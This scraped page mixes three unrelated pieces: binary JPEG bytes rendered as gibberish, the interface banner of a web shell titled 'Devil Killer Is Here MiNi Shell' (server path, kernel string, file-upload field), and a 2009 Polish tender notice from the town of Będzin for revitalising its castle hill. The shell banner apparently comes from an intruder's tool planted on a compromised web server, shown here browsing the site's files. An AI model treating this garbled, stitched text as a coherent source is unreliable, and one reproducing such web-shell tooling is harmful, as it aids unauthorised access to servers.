JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/37122-N-2009.html

<p class="kh_header"><b>Będzin: Rewaloryzacja wzgórza zamkowego wraz z zabezpieczeniem i odtworzeniem elementów zabytkowych w ramach projektu subregionalnego pn: Zachowanie dziedzictwa kulturowego i osiągnięć kulturalnych Zagłębia</b><br>
<b>Numer ogłoszenia: 37122 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 032 267-35-16, faks (032) 267 62 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewaloryzacja wzgórza zamkowego wraz z zabezpieczeniem i odtworzeniem elementów zabytkowych w ramach projektu subregionalnego pn: Zachowanie dziedzictwa kulturowego i osiągnięć kulturalnych Zagłębia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej i wykonawczej dla zadania:  Rewaloryzacja wzgórza zamkowego wraz z zabezpieczeniem i odtworzeniem elementów zabytkowych  w ramach projektu subregionalnego pn:  Zachowanie dziedzictwa kulturowego i osiągnięć kulturalnych Zagłębia  z wykorzystaniem materiałów pomocniczych:
-Koncepcja Rewaloryzacji Parku na Wzgórzu Zamkowym w Będzinie (zał. nr 6 do SIWZ)
- Założenia do projektu technicznego w ramach Koncepcji rewaloryzacji Wzgórza Zamkowego w Będzinie autorstwa Krystyny Pawłowskiej (zał. nr 7 do SIWZ)
- Mapa lokalizująca tereny objęte badaniami archeologicznymi (zał. nr 8 do SIWZ)
- Park w strukturze urbanistycznej miasta - zakres opracowania (zał. nr 9 do SIWZ)

Opracowanie należy wykonać w dwóch etapach:
Etap I   KONCEPCJE
1. Koncepcja zachowania i wyeksponowania zabytków archeologicznych na terenie parku 
- średniowieczny wał obronny i ziemianka.
2. Koncepcja zagospodarowania  ogródka jordanowskiego oraz terenu zlokalizowanego między ogrodem jordanowskim a ul. Podzamcze z przeznaczeniem na cele rekreacyjno 
-zabawowe, przy założeniu podziału ogrodu na teatrzyk i część zabawową dla małych
dzieci.
3. Koncepcja zagospodarowania terenu w obrębie wejścia do podziemi od ul. Podzamcze.
Uwagi dla Etapu I :
W trakcie prac I etapu wskazane jest posiłkować się wynikami badań archeologicznych i historycznych będących w posiadaniu Muzeum Zagłębia w Będzinie, które udostępni Zamawiający Wykonawcy wybranemu w przetargu. 

 Należy zinwentaryzować wiedzę archeologiczną i historyczną terenu parku, w tym przeprowadzone prace archeologiczne ze szczególnym wskazaniem na wał średnio-wieczny i ziemiankę. Na wszystkich etapach należy konsultować się z Wojewódzkim Konserwatorem Zabytków i archeologiem wskazanym przez UM Będzin.
Etap II  PROJEKT BUDOWLANY I WYKONAWCZY wraz z kompletem materiałów niezbędnych do złożenia wniosków zgłoszenia robót i pozwoleń na budowę
1. Projekt zagospodarowania terenu w skali 1:500.
2. Projekt przebudowy układu komunikacyjnego - alejki parkowe, tzw. miejsca magiczne, schody terenowe (z uwzględnieniem istniejącego przebiegu i wartościowej nawierzchni) urządzenie wejść do parku (istniejące i projektowane), wraz z zestawieniem materiałów przedmiarem i kosztorysem inwestorskim.
3. Projekt infrastruktury elektrycznej i oświetlenia terenu objętego opracowaniem z uwzględnieniem podłączenia obiektów kubaturowych wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
4. Projekt instalacji wod-kan dla terenu objętego opracowaniem z uwzględnieniem 
podłączenia obiektów kubaturowych i miejsca poboru wody wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
5. Projekt budowlano - wykonawczy obiektów małej architektury oraz obiektów kubaturowych, wynikających z Koncepcji Rewaloryzacji Parku na Wzgórzu Zamkowym w Będzinie znajdujących się w granicach zleconego opracowania (zał. nr 6 do SIWZ)
wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
6. Projekt rekonstrukcji obiektów historycznych - ziemianka, wał obronny, wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
7. Projekt zagospodarowania ogródka jordanowskiego wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
8. Projekt remontu muru w obrębie wejścia do parku od strony zach. ulicy Góra Zamkowa wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
9. Projekt wejścia do podziemi od ulicy Podzamcze wraz z zagospodarowaniem terenu w obrębie wejścia, wraz z przedmiarem, zestawieniem materiałów i kosztorysem inwestorskim.
10. Specyfikacje techniczne wykonania i odbioru robót.
11. Projekt zieleni.
Uwagi dla Etapu II :
Przystąpienie do realizacji etapu II warunkowane jest uzyskaniem akceptacji ze strony Urzędu Miejskiego dla koncepcji opracowanych w etapie I. Należy uwzględnić rozwiązanie projektowanej stacji transformatorowej - kontakt z P.H.U. APOL  Usługi Projektowe 42-580 Wojkowice ul. Sobieskiego 26a. 
Do obowiązków projektanta należy:
1 aktualizacja inwentaryzacji zieleni,
2 uzyskanie mapy do celów projektowych,
3 uzyskanie wszelkich niezbędnych uzgodnień branżowych, 
4 przygotowanie dokumentów do złożenia wniosku o pozwolenie na budowę,
5 Wykonawca do dnia 15 10.2009 r. dostarczy wykaz z projektu budowlanego zawierający numery tomów, tytuły i autorów opracowań wraz z numerami uprawnień oraz opis techniczny wraz z kserokopią stron tytułowych i spisu treści poszczególnych części projektu budowlanego.

Zamawiający dopuszcza wskazanie w dokumentacji projektowej na znak towarowy, patent lub pochodzenie tylko w uzasadnionych względów technologicznych, ekonomicznych, organizacyjnych lub jeżeli obowiązek taki wynika z odrębnych przepisów. W takim przypadku przy wskazaniu powinien być dopisek, lub równoważne. 

Dokumentację techniczną należy wykonać w 6 egzemplarzach, przedmiar w 4 egzemplarzach, kosztorys inwestorski w 2 egzemplarzach, STWiOR w 4 egzemplarzach.
Ponadto całość dokumentacji należy opracować w wersji elektronicznej na płycie CD - 2 szt.
( wersja PDF, plik czytany przez program NORMA PRO).

UWAGA!
Dokumentację projektową należy wykonać zgodnie z:
1. Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. (Dz.U. z 2004r. Nr 202 poz. 2072 ze zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego.
2. Ustawą Prawo budowlane z dnia 7 lipca 1994 r. z późniejszymi zmianami.
3. Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. (Dz.U. z 2003r. 
Nr 120 poz.1126)  w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.
4. Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz.U. z 2004r. Nr 130 poz. 1389) w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym.
5. Ustawą z dnia 10 kwietnia 2003r. - o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg lokalnych z późniejszymi zmianami..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępując do udziału w postępowaniu  obowiązany jest wnieść wadium stosownie do art.45 i następne ustawy Prawo zamówień publicznych 
( tj. Dz. U z 2007r. Nr 223 poz. 1655 ze zm. ) w wysokości: 5 000,00 zł ( słownie: pięć tysięcy złotych 00/100) 
2.Wykonawca wnoszący wadium w formie pieniężnej winien przelać je na konto: 
ING Bank Śląski S.A O/Będzin nr 44 1050 1142 1000 0023 0074 0087 z dopiskiem Wadium na zadanie: Rewaloryzacja wzgórza zamkowego wraz z zabezpieczeniem i odtworzeniem elementów zabytkowych  w ramach projektu subregionalnego pn: Zachowanie dziedzictwa kulturowego i osiągnięć kulturalnych Zagłębia.
3.W przypadku wniesienia wadium w  formach niepieniężnych, oryginał wadium należy złożyć w Urzędzie  Miejskim w Będzinie Biuro Zamówień Publicznych pok.117 ul. 11 Listopada 20 ,42-500 Będzin.
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)    pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)   gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
5.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku  bankowym.
6. Wadium wnosi się przed upływem terminu składania ofert.
7.Zamawiający zwraca niezwłocznie wadium jeżeli:
a) upłynął termin związania ofertą,
b)zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
c)zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a)który wycofał ofertę przed upływem terminu składania ofert,
b)który został wykluczony z postępowania,
c)którego oferta została odrzucona.
9.Zamawiajacy zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie  pkt.8 ppkt. b) i c), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty
10.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono  przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki uczestnictwa w postępowaniu określone są w ustawie z dnia 29 stycznia 2004r. Prawo zamówień publicznych ( dalej Pzp) ( tj. Dz. U z 2007r. Nr 223 poz. 1655 ze zm. ) oraz  w SIWZ. 
1.O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:  
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
Wymaga się:
a) przedłożenia aktualnego odpisu właściwego rejestru albo aktualnego zaświadczenia  
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne  przepisy wymagają wpisu 
do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
1.2. Posiadają niezbędną  wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
Wymaga się:
a) wykazania wykonanych usług  w okresie ostatnich 3 lat przed dniem wszczęcia     
   postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w     
      tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot     
      zamówienia   z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz  
      załączeniem  dokumentów  (np. referencje)  potwierdzających że usługi te zostały należycie  
      wykonane.
Należy wykazać  3 usługi  na wykonanie projektu budowlano- wykonawczego w zakresie rewaloryzacji obiektów zabytkowych.
1.2.1 dysponowania  min.1 osobą  posiadającą niezbędne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do  projektowania w specjalności:
-  konstrukcyjno - budowlane,
-  instalacyjnej  w zakresie sieci wodociągowych i kanalizacyjnych, 
-  instalacyjnej  w zakresie sieci elektrycznych, 
- drogowej
a także  należącą do właściwej Izby Samorządu Zawodowego.

1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Spełnienie warunków  ppkt. 1.3, 1.4 ocenianie będzie  na podstawie złożonego oświadczenia  na lub według  druku stanowiącego załącznik nr 2 do SIWZ  według reguły spełnia- nie spełnia.

Z postępowania o udzielenie zamówienia wyklucza się:
1)Wykonawców, którzy wyrządzili szkodę nie, wykonując zamówienia lub wykonując je nienależycie, a szkoda ta została stwierdzona prawomocnym orzeczeniem sadu wydanym 
w okresie 3 lat przed wszczęciem postępowania;
2)	Wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono,
z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony
prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli
poprzez likwidację majątku upadłego;
3)	Wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku 
z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano 
za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, 
na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10)Wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w części  V pkt 1.1 - 1.3 SIWZ.
Z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, którzy:
1)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi 
w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
3)	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, 
z zastrzeżeniem art.26 ust.3 ustawy Pzp;
4)	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
2. Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia winni: 
a) ustanowić sposób  reprezentacji poprzez wyznaczenie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  
i zawarcia umowy  i dołączyć do oferty dokument pełnomocnictwa, 
b) w odniesieniu do wymagań postawionych przez Zamawiającego oddzielnie
udokumentować, że nie podlegają  wykluczeniu na podstawie  art.24 ust.1 ustawy Pzp,
c) łącznie wykazać, iż posiadają niezbędną  wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)  opisać ofertę w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.
3. Wykonawca może powierzyć wykonanie zamówienia Podwykonawcom.
Wykonawca winien wskazać w ofercie części zamówienia, której wykonanie powierzy Podwykonawcom.
3.1. Wykonawca może zawrzeć umowę z Podwykonawcą  po uzyskaniu zgody od Zamawiającego.
(Wykonawca winien przedstawić do akceptacji Zamawiającemu umowę lub projekt umowy zawierający zapis dot. zakresu  prac i sposobu rozliczeń finansowych pomiędzy  Zamawiającym, Wykonawcą  i Podwykonawcą). 
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1.1.a części V specyfikacji składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie
wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed  notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach 
i oświadczeniach złożonych przez Wykonawcę.
Niespełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp  na druku lub według druku  załącznik nr 2  do SIWZ.

W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności oraz  że nie podlega wykluczeniu  na podstawie art. 24 ust.1 ustawy Pzp Zamawiający żąda następujących dokumentów:
2.Aktualnego odpisu właściwego rejestru albo aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne  przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  .
 
W celu  potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także że dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
3.Wykazu wykonanych usług (załącznik nr 4 do SIWZ) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich  wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów  odbiorców potwierdzających, że usługi  te zostały wykonane należycie.
Należy wykazać  3 usługi  na wykonanie projektu budowlano- wykonawczego w zakresie rewaloryzacji obiektów zabytkowych.
5. Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, na lub wg wzoru stanowiącego załącznik nr 5 a do SIWZ - dla osób, którymi Wykonawca dysponuje i załącznik nr 5 b do SIWZ - dla osób, którymi Wykonawca będzie dysponował.
Wykaz winien zawierać min.1 osobę  posiadającą niezbędne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do  projektowania w specjalności:
-  konstrukcyjno - budowlane,
-  instalacyjnej  w zakresie sieci wodociągowych i kanalizacyjnych, 
-  instalacyjnej  w zakresie sieci elektrycznych, 
- drogowej
a także  należącą do właściwej Izby Samorządu Zawodowego.

Do wykazu należy dołączyć kopie uprawnień budowlanych wydanych na podstawie ustawy z dnia 7 lipca 1994 r. Prawo Budowlane ( tj. Dz. U z 2006 r. Nr 156 poz. 1118  ze zm.) lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów oraz dokument potwierdzający przynależność  do właściwej Izby Samorządu Zawodowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
